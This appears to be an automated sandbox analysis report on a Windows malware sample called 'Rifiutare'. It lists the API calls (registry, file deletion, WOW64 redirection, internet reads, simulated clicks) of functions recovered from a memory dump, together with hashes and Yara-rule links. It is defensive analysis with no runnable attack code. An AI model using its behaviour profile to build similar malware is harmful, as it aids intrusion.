API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a22b6935ea617a0408d1a705d03e74a0f4f4300f7eb00cf5aa2c7c1386cd882e
Instruction ID: ca16c12d7a0d1207bfc76a1f82179e3eba79deeafba6e1df855a16cf9b1ac8f6
Opcode Fuzzy Hash: a22b6935ea617a0408d1a705d03e74a0f4f4300f7eb00cf5aa2c7c1386cd882e
Instruction Fuzzy Hash: 3CF04435A00608BBDB119B94DC49FAEBFB5EF44752F190075FD0BA2160CB705E84DA95

Function 00C3320E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3321A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C3322C
FreeLibrary.KERNEL32(00000000,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3323E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00C33226
kernel32.dll, xrefs: 00C33212

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 79add4a3c4aa39870071ac29e323b7246a008b780944fcc8dc1b6c70bb73c829
Instruction ID: a174cb744f4e430aa1de97930f2b0fb86b5166bb319861f7e5c1fb61a9925cb5
Opcode Fuzzy Hash: 79add4a3c4aa39870071ac29e323b7246a008b780944fcc8dc1b6c70bb73c829
Instruction Fuzzy Hash: 92E0C2366126221B83222715EC08F6FE6189FC2F32B090035F906E2241DF60CF4184E1

Function 00C331D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C331E0
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C331F2
FreeLibrary.KERNEL32(00000000,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C33205

Strings

kernel32.dll, xrefs: 00C331D9
Wow64RevertWow64FsRedirection, xrefs: 00C331EC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 1feb022d9b991b64ec84985420198af4533e42a94aee1a700d808fb8f3d4d3f4
Instruction ID: 78d1a855dc1931c2c1f86ea51de6f00e354bdfeb8bc8652afa8de1122fae9f8b
Opcode Fuzzy Hash: 1feb022d9b991b64ec84985420198af4533e42a94aee1a700d808fb8f3d4d3f4
Instruction Fuzzy Hash: 73D05B366125715752332725FC18FDF6E14AFC1F313090035F926A2115CF29CF0585D4

Function 00CA31D8 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA3496
DeleteFileW.KERNEL32(?), ref: 00CA3518
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CA352E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA353F
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA3551

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: c5f73829c3922af1ea4e75d743b94cc407ec86dab6407d3c907920ce108692ae
Instruction ID: 83ede3dae099b6739e4ac2f6aff1955d211657598ea7f7bb8025e67e9c791f78
Opcode Fuzzy Hash: c5f73829c3922af1ea4e75d743b94cc407ec86dab6407d3c907920ce108692ae
Instruction Fuzzy Hash: 32B15E72D00169ABDF15DBA4CC95EDEBBBDEF09304F0040A6F50AE6141EA349B85DB61

Function 00CBAAF9 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00CBAB99
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CBABA7
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CBABDA
CloseHandle.KERNEL32(?), ref: 00CBADAF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 5ce05f0967749516fcba624f6da9f6d0d7253f6df74165516e661e42a7889db4
Instruction ID: 47b1282c101f3bfd17ba9f49c764abb392b42a8d8afcd22f7d48ee59acaa5d3d
Opcode Fuzzy Hash: 5ce05f0967749516fcba624f6da9f6d0d7253f6df74165516e661e42a7889db4
Instruction Fuzzy Hash: E6A18F71604301AFD720DF25D882F6AB7E5AF44710F14885DF9AA9B2D2DB70ED41CB92

Function 00CBC149 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC225
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CBC280
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CBC2E3
RegCloseKey.ADVAPI32(?,?), ref: 00CBC326
RegCloseKey.ADVAPI32(00000000), ref: 00CBC333

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 1f44820ad63d4015c66364af253cab282a0cbdb5886e4cad93f68a4f619f3aaf
Instruction ID: f55e26bea34838ab6bdddb83d4ae1666fe7236a2e7b051745406e964ee4a6737
Opcode Fuzzy Hash: 1f44820ad63d4015c66364af253cab282a0cbdb5886e4cad93f68a4f619f3aaf
Instruction Fuzzy Hash: 0C61B471218241AFC714DF54C8D0EAABBE5FF84308F54855CF4AA8B2A2DB31ED45DB92

Function 00C9EBD2 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C9D678,?), ref: 00C9E5C6

Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C9D678,?), ref: 00C9E5DF

Part of subcall function 00C9E970: GetFileAttributesW.KERNEL32(?,00C9D6EB), ref: 00C9E971

lstrcmpiW.KERNEL32(?,?), ref: 00C9EC4A
MoveFileW.KERNEL32(?,?), ref: 00C9EC83
_wcslen.LIBCMT ref: 00C9EDC2
_wcslen.LIBCMT ref: 00C9EDDA
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C9EE27

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: b88e06fb879fd37f6f2e1d1a923f85a72a2295f1366b3749b1d58f104c041f57
Instruction ID: 912bb07182309b9dae42ef10596b97500f460ce5563a13331936d555df41bb91
Opcode Fuzzy Hash: b88e06fb879fd37f6f2e1d1a923f85a72a2295f1366b3749b1d58f104c041f57
Instruction Fuzzy Hash: 7D5154B24083849BCB24DB94DC95ADFB7ECAF94300F00092EF5D9D3152EF74A688975A

Function 00C993CC Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C993E9
VariantClear.OLEAUT32 ref: 00C9945A
VariantClear.OLEAUT32 ref: 00C994B9
VariantClear.OLEAUT32(?), ref: 00C9952C
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C99557

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c97e2c1e84eb6bf2d343f4b8099dbc274718deb1962a8d46e21fe29aec1f796a
Instruction ID: f26dca2967d126c7bd2f5dfcaabe9498dddd5fb1ddc09276537b7f58425e2471
Opcode Fuzzy Hash: c97e2c1e84eb6bf2d343f4b8099dbc274718deb1962a8d46e21fe29aec1f796a
Instruction Fuzzy Hash: 34514AB5A00219EFDB15CF58C884AAAB7F8FF89314B158569F915DB310E730E911CF50

Function 00CA92FC Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CA93AF
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00CA93DB
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CA9433
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CA9458
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CA9460

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: d13f1e31bb607e952ea04b18781b49b9eb43f216f7fd7c4f6367f5bd75d4aa40
Instruction ID: 7bea4caba592c5c2f7a790016cc1e90eed52aec3cc61af15cbdb69f4d4a3582a
Opcode Fuzzy Hash: d13f1e31bb607e952ea04b18781b49b9eb43f216f7fd7c4f6367f5bd75d4aa40
Instruction Fuzzy Hash: 70513A35A002159FCB15DF64C885EADBBF5FF49354F048058E84AAB3A2CB31ED51DB90

Function 00CB9656 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00CB96B2
GetProcAddress.KERNEL32(00000000,?), ref: 00CB9742
GetProcAddress.KERNEL32(00000000,00000000), ref: 00CB975E
GetProcAddress.KERNEL32(00000000,?), ref: 00CB97A4
FreeLibrary.KERNEL32(00000000), ref: 00CB97C4

Part of subcall function 00C4F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CA18D4,?,753CE610), ref: 00C4FA0E
Part of subcall function 00C4F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C90283,00000000,00000000,?,?,00CA18D4,?,753CE610,?,00C90283), ref: 00C4FA35

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: aa45ffcddf2a7d3d0f1455f827593b0041e0ec676667e8a6f8b138bff80dc6f1
Instruction ID: b0b287ddea994bcaf9137abcbc335c61826996d4f295d60165ed83ea4b75cb81
Opcode Fuzzy Hash: aa45ffcddf2a7d3d0f1455f827593b0041e0ec676667e8a6f8b138bff80dc6f1
Instruction Fuzzy Hash: 205128756142459FCB11DF58C4949DDBBF0FF09324F0981A8E91AAB362DB31EE85CB90

Function 00CC715D Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CC721A
SetWindowLongW.USER32(?,000000EC,?), ref: 00CC7231
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CC725A
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00CAB3AC,00000000,00000000), ref: 00CC727F
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CC72AE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 1c51a014ebb6c2827aac8204f7787da3d73c5ab2a5a8bff01d4179f312a17662
Instruction ID: eaf757b7483cfe239e13bea272578034bac69bb3c165af9e0e04fdf85b4d654b
Opcode Fuzzy Hash: 1c51a014ebb6c2827aac8204f7787da3d73c5ab2a5a8bff01d4179f312a17662
Instruction Fuzzy Hash: A4418335A08204EFD725DF78CC48FA9BBA5EB49360F150368F869A72E1C770AE41DE50

Function 00C623E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C62453
_free.LIBCMT ref: 00C62473

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1130db3c206f076f8d4d66756ccab7d85c40442c5338ff053f3df29498ebfe35
Instruction ID: a656f8484d060b3f200e5071606e8984335cf1f489ba2d06451faef240ad9621
Opcode Fuzzy Hash: 1130db3c206f076f8d4d66756ccab7d85c40442c5338ff053f3df29498ebfe35
Instruction Fuzzy Hash: F041B232A006009BCB24DF68C8C1A6DB7E5EF84314F1545A8E916EB391DA31ED42DB41

Function 00CA418B Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00CA41E2
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CA4239
TranslateMessage.USER32(?), ref: 00CA4262
DispatchMessageW.USER32(?), ref: 00CA426C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CA427D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 31b350059041038b6ec378d89b9d8b62a3a5386658b0cb442d27410a0aabe92b
Instruction ID: d6eb2402d56f00bd1b7ca5e325519eaf0eba14bed32dd49d244e886a00bb6a05
Opcode Fuzzy Hash: 31b350059041038b6ec378d89b9d8b62a3a5386658b0cb442d27410a0aabe92b
Instruction Fuzzy Hash: 4F31B5705413439EEB3C8B74D848FBA3BA8AB5230CF14062DE57AC25A0E7F49A85D721

Function 00C9217B Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C9218F
PostMessageW.USER32(00000001,00000201,00000001), ref: 00C9223B
Sleep.KERNEL32(00000000,?,?,?), ref: 00C92243
PostMessageW.USER32(00000001,00000202,00000000), ref: 00C92254
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C9225C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 73fe2d1af2742b25e202060b901e764877d96dacc5b52e53b858009dae3710be
Instruction ID: 89b845a0ff46fa51ce5723eefccc2bde99519e98ea0a9443733ceca53edf8d9c
Opcode Fuzzy Hash: 73fe2d1af2742b25e202060b901e764877d96dacc5b52e53b858009dae3710be
Instruction Fuzzy Hash: 93319E72900219EFDF04CFA8CD8DB9E7BB5EB04325F104229FA66A72D1C3709A54DB90

Function 00CAD748 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD766
InternetReadFile.WININET(?,00000000,?,?), ref: 00CAD79D
GetLastError.KERNEL32(?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD7E2
SetEvent.KERNEL32(?,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD7F6
SetEvent.KERNEL32(?,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD820

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 9b406ed070da95e31288be4b70062fd5ff47b65b50f4934fadece596ff11082c
Instruction ID: cb81484bedf57a93745a5a1162670ffc13359a66f7b035dd6cc4678ae0da02ad
Opcode Fuzzy Hash: 9b406ed070da95e31288be4b70062fd5ff47b65b50f4934fadece596ff11082c
Instruction Fuzzy Hash: 9B315E71900606AFDB24DFA5D888EAFBBF8EB05359B10442DE457D2550DB34EE41DBA0

Function 00CB1176 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00CB1197
GetForegroundWindow.USER32 ref: 00CB11AE
GetDC.USER32(00000000), ref: 00CB11EA
GetPixel.GDI32(00000000,?,00000003), ref: 00CB11F6
ReleaseDC.USER32(00000000,00000003), ref: 00CB122E

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 956bbdf563500ed06932d3b502b453093981f2c9e6fd9b8d9e3ef563cf9c4ca1
Instruction ID: 090562696b2f0baea576341cb6af5730141eccf6970c3397fb33edb15faf09cc
Opcode Fuzzy Hash: 956bbdf563500ed06932d3b502b453093981f2c9e6fd9b8d9e3ef563cf9c4ca1
Instruction Fuzzy Hash: 5D216D36A10214AFD714EF69C898A9EBBE5EF49300F048478F84BE7661DA30AD44DB90

Function 00C6D1DD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C6D1E6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6D209

Part of subcall function 00C63C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C6D22F
_free.LIBCMT ref: 00C6D242
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6D251

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
